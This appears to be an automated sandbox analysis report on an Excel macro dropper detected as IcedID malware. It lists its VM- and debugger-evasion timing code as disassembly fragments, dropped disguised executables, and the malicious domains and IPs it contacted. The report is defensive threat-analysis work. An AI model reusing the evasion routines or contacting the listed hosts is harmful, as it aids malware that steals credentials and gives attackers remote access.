Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00231B94 3_2_00231B94
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_00141B94 6_2_00141B94
Tries to detect virtualization through RDTSC time measurements
Source: C:\Windows\System32\rundll32.exe RDTSC instruction interceptor: First address: 0000000000231C52 second address: 0000000000231C73 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec esp 0x0000000a mov eax, eax 0x0000000c xor ecx, ecx 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 mov dword ptr [ebp-10h], eax 0x00000018 mov dword ptr [ebp-0Ch], ebx 0x0000001b mov dword ptr [ebp-08h], ecx 0x0000001e mov dword ptr [ebp-04h], edx 0x00000021 rdtsc
Source: C:\Windows\System32\rundll32.exe RDTSC instruction interceptor: First address: 0000000000231C73 second address: 0000000000231C88 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec ecx 0x0000000a sub eax, eax 0x0000000c dec eax 0x0000000d add edi, eax 0x0000000f call dword ptr [00002428h] 0x00000015 jmp 00007F47E0EA1178h 0x00000017 jmp dword ptr [000925C2h] 0x0000001d dec eax 0x0000001e sub esp, 28h 0x00000021 dec eax 0x00000022 lea ecx, dword ptr [esp+30h] 0x00000026 call dword ptr [00046D21h] 0x0000002c dec eax 0x0000002d mov dword ptr [esp+08h], ecx 0x00000031 dec eax 0x00000032 sub esp, 18h 0x00000035 dec eax 0x00000036 test ecx, ecx 0x00000038 je 00007F47E0EDBE5Dh 0x0000003e dec esp 0x00000040 mov eax, dword ptr [00000030h] 0x00000047 xor eax, eax 0x00000049 dec eax 0x0000004a mov dword ptr [esp+08h], eax 0x0000004e dec ecx 0x0000004f mov edx, dword ptr [eax+000014A0h] 0x00000055 dec eax 0x00000056 mov dword ptr [esp+08h], edx 0x0000005a dec eax 0x0000005b test edx, edx 0x0000005d jne 00007F47E0EBA66Ch 0x00000063 mov eax, C00000BBh 0x00000068 mov dword ptr [esp], eax 0x0000006b jmp 00007F47E0EA1172h 0x0000006d jmp 00007F47E0EA1172h 0x0000006f dec eax 0x00000070 mov dword ptr [ecx], edx 0x00000072 dec eax 0x00000073 add esp, 18h 0x00000076 ret 0x00000077 test eax, eax 0x00000079 jns 00007F47E0EC10DFh 0x0000007f call dword ptr [00046D5Bh] 0x00000085 dec esp 0x00000086 mov edx, ecx 0x00000088 mov eax, 00000043h
Source: C:\Windows\System32\rundll32.exe RDTSC instruction interceptor: First address: 0000000000231C88 second address: 0000000000231C95 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 nop 0x00000007 dec eax 0x00000008 or eax, edx 0x0000000a dec eax 0x0000000b mov ecx, eax 0x0000000d rdtsc
Source: C:\Windows\System32\rundll32.exe RDTSC instruction interceptor: First address: 0000000000231C95 second address: 0000000000231C52 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec eax 0x0000000a sub eax, ecx 0x0000000c dec esp 0x0000000d add esi, eax 0x0000000f dec ecx 0x00000010 sub edi, 01h 0x00000013 jne 00007F47E0EA1114h 0x00000015 call dword ptr [0000245Eh] 0x0000001b jmp 00007F47E0EA1178h 0x0000001d jmp dword ptr [000925C2h] 0x00000023 dec eax 0x00000024 sub esp, 28h 0x00000027 dec eax 0x00000028 lea ecx, dword ptr [esp+30h] 0x0000002c call dword ptr [00046D21h] 0x00000032 dec eax 0x00000033 mov dword ptr [esp+08h], ecx 0x00000037 dec eax 0x00000038 sub esp, 18h 0x0000003b dec eax 0x0000003c test ecx, ecx 0x0000003e je 00007F47E0EDBE5Dh 0x00000044 dec esp 0x00000046 mov eax, dword ptr [00000030h] 0x0000004d xor eax, eax 0x0000004f dec eax 0x00000050 mov dword ptr [esp+08h], eax 0x00000054 dec ecx 0x00000055 mov edx, dword ptr [eax+000014A0h] 0x0000005b dec eax 0x0000005c mov dword ptr [esp+08h], edx 0x00000060 dec eax 0x00000061 test edx, edx 0x00000063 jne 00007F47E0EBA66Ch 0x00000069 mov eax, C00000BBh 0x0000006e mov dword ptr [esp], eax 0x00000071 jmp 00007F47E0EA1172h 0x00000073 jmp 00007F47E0EA1172h 0x00000075 dec eax 0x00000076 mov dword ptr [ecx], edx 0x00000078 dec eax 0x00000079 add esp, 18h 0x0000007c ret 0x0000007d test eax, eax 0x0000007f jns 00007F47E0EC10DFh 0x00000085 call dword ptr [00046D5Bh] 0x0000008b dec esp 0x0000008c mov edx, ecx 0x0000008e mov eax, 00000043h
Source: C:\Windows\System32\rundll32.exe RDTSC instruction interceptor: First address: 0000000000141C52 second address: 0000000000141C73 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec esp 0x0000000a mov eax, eax 0x0000000c xor ecx, ecx 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 mov dword ptr [ebp-10h], eax 0x00000018 mov dword ptr [ebp-0Ch], ebx 0x0000001b mov dword ptr [ebp-08h], ecx 0x0000001e mov dword ptr [ebp-04h], edx 0x00000021 rdtsc
Source: C:\Windows\System32\rundll32.exe RDTSC instruction interceptor: First address: 0000000000141C73 second address: 0000000000141C88 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec ecx 0x0000000a sub eax, eax 0x0000000c dec eax 0x0000000d add edi, eax 0x0000000f call dword ptr [00002428h] 0x00000015 jmp 00007F47E0EA1178h 0x00000017 jmp dword ptr [000925C2h] 0x0000001d dec eax 0x0000001e sub esp, 28h 0x00000021 dec eax 0x00000022 lea ecx, dword ptr [esp+30h] 0x00000026 call dword ptr [00046D21h] 0x0000002c dec eax 0x0000002d mov dword ptr [esp+08h], ecx 0x00000031 dec eax 0x00000032 sub esp, 18h 0x00000035 dec eax 0x00000036 test ecx, ecx 0x00000038 je 00007F47E0EDBE5Dh 0x0000003e dec esp 0x00000040 mov eax, dword ptr [00000030h] 0x00000047 xor eax, eax 0x00000049 dec eax 0x0000004a mov dword ptr [esp+08h], eax 0x0000004e dec ecx 0x0000004f mov edx, dword ptr [eax+000014A0h] 0x00000055 dec eax 0x00000056 mov dword ptr [esp+08h], edx 0x0000005a dec eax 0x0000005b test edx, edx 0x0000005d jne 00007F47E0EBA66Ch 0x00000063 mov eax, C00000BBh 0x00000068 mov dword ptr [esp], eax 0x0000006b jmp 00007F47E0EA1172h 0x0000006d jmp 00007F47E0EA1172h 0x0000006f dec eax 0x00000070 mov dword ptr [ecx], edx 0x00000072 dec eax 0x00000073 add esp, 18h 0x00000076 ret 0x00000077 test eax, eax 0x00000079 jns 00007F47E0EC10DFh 0x0000007f call dword ptr [00046D5Bh] 0x00000085 dec esp 0x00000086 mov edx, ecx 0x00000088 mov eax, 00000043h
Source: C:\Windows\System32\rundll32.exe RDTSC instruction interceptor: First address: 0000000000141C88 second address: 0000000000141C95 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 nop 0x00000007 dec eax 0x00000008 or eax, edx 0x0000000a dec eax 0x0000000b mov ecx, eax 0x0000000d rdtsc
Source: C:\Windows\System32\rundll32.exe RDTSC instruction interceptor: First address: 0000000000141C95 second address: 0000000000141C52 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec eax 0x0000000a sub eax, ecx 0x0000000c dec esp 0x0000000d add esi, eax 0x0000000f dec ecx 0x00000010 sub edi, 01h 0x00000013 jne 00007F47E0EA1114h 0x00000015 call dword ptr [0000245Eh] 0x0000001b jmp 00007F47E0EA1178h 0x0000001d jmp dword ptr [000925C2h] 0x00000023 dec eax 0x00000024 sub esp, 28h 0x00000027 dec eax 0x00000028 lea ecx, dword ptr [esp+30h] 0x0000002c call dword ptr [00046D21h] 0x00000032 dec eax 0x00000033 mov dword ptr [esp+08h], ecx 0x00000037 dec eax 0x00000038 sub esp, 18h 0x0000003b dec eax 0x0000003c test ecx, ecx 0x0000003e je 00007F47E0EDBE5Dh 0x00000044 dec esp 0x00000046 mov eax, dword ptr [00000030h] 0x0000004d xor eax, eax 0x0000004f dec eax 0x00000050 mov dword ptr [esp+08h], eax 0x00000054 dec ecx 0x00000055 mov edx, dword ptr [eax+000014A0h] 0x0000005b dec eax 0x0000005c mov dword ptr [esp+08h], edx 0x00000060 dec eax 0x00000061 test edx, edx 0x00000063 jne 00007F47E0EBA66Ch 0x00000069 mov eax, C00000BBh 0x0000006e mov dword ptr [esp], eax 0x00000071 jmp 00007F47E0EA1172h 0x00000073 jmp 00007F47E0EA1172h 0x00000075 dec eax 0x00000076 mov dword ptr [ecx], edx 0x00000078 dec eax 0x00000079 add esp, 18h 0x0000007c ret 0x0000007d test eax, eax 0x0000007f jns 00007F47E0EC10DFh 0x00000085 call dword ptr [00046D5Bh] 0x0000008b dec esp 0x0000008c mov edx, ecx 0x0000008e mov eax, 00000043h
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00231B94 rdtsc 3_2_00231B94
Contains functionality to query network adapater information
Source: C:\Windows\System32\rundll32.exe Code function: GetAdaptersInfo,GetAdaptersInfo, 3_2_00231F94
Source: C:\Windows\System32\rundll32.exe Code function: GetAdaptersInfo,GetAdaptersInfo, 6_2_00141F94
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\rundll32.exe Window / User API: threadDelayed 666 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\3003[1].gif Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\3003[1].gif Jump to dropped file
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\rundll32.exe Last function: Thread delayed
Source: C:\Windows\System32\rundll32.exe Last function: Thread delayed
Source: C:\Windows\System32\rundll32.exe Last function: Thread delayed
Source: C:\Windows\System32\rundll32.exe Last function: Thread delayed
Source: C:\Windows\System32\rundll32.exe Thread delayed: delay time: 60000 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Thread delayed: delay time: 60000 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Thread delayed: delay time: 60000 Jump to behavior
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp Binary or memory string: </figure> <h3 id="VMware_Cloud_on_AWS" class="lb-tiny-align-center lb-txt-none lb-txt-white lb-h3 lb-title"> VMware Cloud on AWS</h3>
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp Binary or memory string: <a style="padding-left:30px; padding-right:30px;" href="/vmware/?hp=tile&amp;tile=hybridsol" target="_blank" rel="noopener">
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp Binary or memory string: <img src="//d1.awsstatic.com/webteam/homepage/Hybrid%20Solutions/VMWareCloud_Icon.55cb0bcef2c74b55acdb7155e3524e4b5436ec6e.png" alt="VMWareCloud_Icon" title="VMWareCloud_Icon" class="cq-dd-image" />
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp Binary or memory string: Migrate and extend VMware environments to the AWS Cloud
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp Binary or memory string: <a href="/vmware/?hp=tile&amp;so-exp=below"> VMware Cloud on AWS<span>Build a hybrid cloud without custom hardware</span> </a>
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp Binary or memory string: <a style="padding-left:20px; padding-right:45px;" href="/vmware/?hp=tile&amp;tile=hybridsol" target="_blank" rel="noopener">
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp Binary or memory string: <a href="/rds/vmware/?hp=tile&amp;so-exp=below"> Amazon RDS on VMware<span>Automate on-premises database management</span> </a>

Anti Debugging:

barindex
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00231B94 rdtsc 3_2_00231B94

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\rundll32.exe Network Connect: 143.204.3.74 187 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Domain query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe Domain query: aws.amazon.com
Source: C:\Windows\System32\rundll32.exe Domain query: usaaforced.fun
Source: rundll32.exe, 00000003.00000002.2497854303.0000000000890000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: rundll32.exe, 00000003.00000002.2497854303.0000000000890000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 00000003.00000002.2497854303.0000000000890000.00000002.00000001.sdmp Binary or memory string: !Progman
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00231D48 LookupAccountNameW, 3_2_00231D48

Stealing of Sensitive Information:

barindex
Yara detected IcedID
Source: Yara match File source: 00000003.00000002.2497781112.000000000038E000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2174963879.00000000002E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2172023641.00000000002E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2173003375.00000000002E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2497738687.00000000002E1000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2173701556.00000000002E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2172513544.00000000002E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 2796, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 2540, type: MEMORY

Remote Access Functionality:

barindex
Yara detected IcedID
Source: Yara match File source: 00000003.00000002.2497781112.000000000038E000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2174963879.00000000002E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2172023641.00000000002E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2173003375.00000000002E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2497738687.00000000002E1000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2173701556.00000000002E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2172513544.00000000002E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 2796, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 2540, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 382871 Sample: document-1251000362.xlsm Startdate: 06/04/2021 Architecture: WINDOWS Score: 100 30 usaaforced.fun 2->30 32 tvorartificialnature.xyz 2->32 52 Found malware configuration 2->52 54 Multi AV Scanner detection for submitted file 2->54 56 Document exploit detected (drops PE files) 2->56 58 9 other signatures 2->58 7 EXCEL.EXE 87 52 2->7         started        signatures3 process4 dnsIp5 34 agenbolatermurah.com 7->34 36 partsapp.com.br 192.185.214.87, 443, 49168 UNIFIEDLAYER-AS-1US United States 7->36 38 3 other IPs or domains 7->38 22 C:\Users\user\ksjvoefv.skd3, PE32+ 7->22 dropped 24 C:\Users\user\ksjvoefv.skd, PE32+ 7->24 dropped 26 C:\Users\user\AppData\Local\...\3003[1].gif, PE32+ 7->26 dropped 28 2 other malicious files 7->28 dropped 60 Document exploit detected (UrlDownloadToFile) 7->60 12 rundll32.exe 7->12         started        16 rundll32.exe 7->16         started        18 rundll32.exe 7->18         started        20 2 other processes 7->20 file6 signatures7 process8 dnsIp9 40 usaaforced.fun 12->40 42 aws.amazon.com 12->42 48 3 other IPs or domains 12->48 62 System process connects to network (likely due to code injection or exploit) 12->62 64 Performs DNS queries to domains with low reputation 12->64 66 Contains functionality to detect hardware virtualization (CPUID execution measurement) 12->66 68 Tries to detect virtualization through RDTSC time measurements 12->68 44 usaaforced.fun 16->44 46 tvorartificialnature.xyz 16->46 50 2 other IPs or domains 16->50 signatures10 70 Outdated Microsoft Office dropper detected 42->70
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
50.87.146.86
 columbia.aula-web.net United States
46606 UNIFIEDLAYER-AS-1US false
199.79.62.99
 tajushariya.com United States
394695 PUBLIC-DOMAIN-REGISTRYUS false
192.185.214.87
 partsapp.com.br United States
46606 UNIFIEDLAYER-AS-1US false
143.204.3.74
 dr49lng3n1n2s.cloudfront.net United States
16509 AMAZON-02US false
192.185.48.186
 metaflip.io United States
46606 UNIFIEDLAYER-AS-1US false

Private
IP
192.168.2.255

Contacted Domains

Name IP Active
metaflip.io 192.185.48.186 true
tajushariya.com 199.79.62.99 true
columbia.aula-web.net 50.87.146.86 true
dr49lng3n1n2s.cloudfront.net 143.204.3.74 true
partsapp.com.br 192.185.214.87 true
agenbolatermurah.com unknown unknown
usaaforced.fun unknown unknown
tvorartificialnature.xyz unknown unknown
aws.amazon.com unknown unknown